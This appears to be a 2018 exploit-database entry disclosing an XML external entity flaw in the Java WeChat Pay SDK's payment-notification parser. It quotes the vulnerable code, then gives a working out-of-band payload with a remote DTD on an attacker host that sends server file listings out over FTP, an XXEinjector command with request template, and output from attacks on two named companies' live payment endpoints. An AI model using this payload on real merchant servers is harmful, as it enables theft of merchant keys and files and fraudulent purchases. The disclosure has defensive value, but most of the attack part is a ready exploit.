Lucene search
K

WeChat Pay SDK XXE Injection Vulnerability

🗓️ 03 Jul 2018 00:00:00Reported by Rose JackcodeType 
zdt
 zdt
🔗 0day.today👁 64 Views

WeChat Pay SDK XXE Injection Vulnerability in JAVA version SDK allows attackers to steal merchant information and make unauthorized purchases

Code
[Title]


XXE  in  WeChat Pay  Sdk ( WeChat leave a backdoor on merchant websites)


------------------------------------------


[Background]

aMobile payments surge to $9 trillion a year, changing how people shop,
borrowaeven panhandlea,  as WSJ.com once reported.  As a payment security
researcher, I occasionally found a perilous problem about WeChat Pay which
I think may be esay to make use of.  Therefore, I hope to be able to
contact with WeChat Pay quickly.


------------------------------------------


[Description]

    When using WeChat payment merchants need providing a notification URL
to accept asynchronous payment results. Unfortunately, WeChat
unintentionally provides a xxe vulnerability in the JAVA version SDK which
handles this result. The attacker can build malicious payload towards the
notification URL to steal any information of the merchant server as he or
she want. Once the attacker get the crucial security key (md5-key and
merchant-Id etc.) of the merchant , he can even buy anything without paying
by just sending forged info to deceive the merchants.

WeChat can fix it by updating the SDK quite easily, however the bad side

is while exposing merchants may need a long time to go for the sake of time,
cost and skills needed.


------------------------------------------


[Authors]


 1024fresher

 ------------------------------------------


[Detail]


   The SDK  in this page:  https://pay.weixin.qq.com/wiki/doc/api/jsapi.php
chapter=11_1

   Just in java vision:
https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip

    or
https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o6ud/view(
Backup i1/4





   README.md in  WxPayApi_JAVA_v3.zip,it show more details:



   notify code example:

    [

        String notifyData = "....";

        MyConfig config = new MyConfig();

        WXPay wxpay = new WXPay(config);

//conver to map

        Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);


        if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {

//do business logic

        }

        else {

         }



     ]

    WXPayUtil source code

   [


  public static Map<String, String> xmlToMap(String strXML) throws
Exception {

    try {

            Map<String, String> data = new HashMap<String, String>();

            /*** not disabled xxe *****/

            //start parse


            DocumentBuilderFactory documentBuilderFactory =
DocumentBuilderFactory.newInstance();

            DocumentBuilder documentBuilder =
documentBuilderFactory.newDocumentBuilder();

            InputStream stream = new ByteArrayInputStream(strXML.getBytes(
"UTF-8"));

            org.w3c.dom.Document doc = documentBuilder.parse(stream);



           //end parse





            doc.getDocumentElement().normalize();

            NodeList nodeList = doc.getDocumentElement().getChildNodes();

            for (int idx = 0; idx < nodeList.getLength(); ++idx) {

                Node node = nodeList.item(idx);

                if (node.getNodeType() == Node.ELEMENT_NODE) {

                    org.w3c.dom.Element element = (org.w3c.dom.Element) node
;

                    data.put(element.getNodeName(), element.getTextContent
());

                }

            }

            try {

                stream.close();

            } catch (Exception ex) {

                // do nothing

            }

            return data;

        } catch (Exception ex) {

            WXPayUtil.getLogger().warn("Invalid XML, can not convert to
map. Error message: {}. XML content: {}", ex.getMessage(), strXML);

            throw ex;

        }

    }



]








------------------------------------------


[Attack demo]



Post merchant notification url with  payload:


<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

  <!ENTITY % attack SYSTEM "file:///etc/">

  <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">

  %xxe;

]>


data.dtd:


<!ENTITY % shell "<!ENTITY &#x25; upload SYSTEM 'ftp://attack:33/%attack;
'>">

%shell;

%upload;



or use  XXEinjector tool  ahttps://github.com/enjoiz/XXEinjectora


ruby XXEinjector.rb --host=attacker --path=/etc   --file=req.txt --ssl


req.txt :

POST merchant_notification_url HTTP/1.1

Host:  merchant_notification_url_host

User-Agent: curl/7.43.0

Accept: */*

Content-Length: 57

Content-Type: application/x-www-form-urlencoded


XXEINJECT





In order to prove this, I got 2 chinese famous company:

   aamomo: Well-known chat tools like WeChat

   bavivo i1/4China's famous mobile phone,that also famous in my country



Example  momo :

  attack:

     notify url:    https://pay.immomo.com/weixin/notify

              cmd:  /home/



      result:



      ***

      logs

      zhang.jiax**

      zhang.shaol**

      zhang.xia**

      ****


    attack:

     notify url:    https://pay.immomo.com/weixin/notify

              cmd:  /home/logs



      result:

      ***

       moa-service

       momotrace

      ****


Example  vivo :

  attack:

     notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo

              cmd: /home/



      result:

         tomcat


  attack:

     notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo

              cmd: /home/tomcat

     result:

        .bash_logout

.bash_profile

.bashrc

logs


 attack:

     notify url:   https://pay.vivo.com.cn/webpay/wechat/callback.oo

              cmd: /home/tomcat/logs

     result:

           ****

           tomcat-2018-06-28.log

  tomcat-2018-06-29.log

  tomcat-2018-06-30.log

           *****








------------------------------------------


[Reference]


https://www.youtube.com/watch?v=BZOg_NgvP18

https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf



Regards,


1024rosecode

#  0day.today [2018-07-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation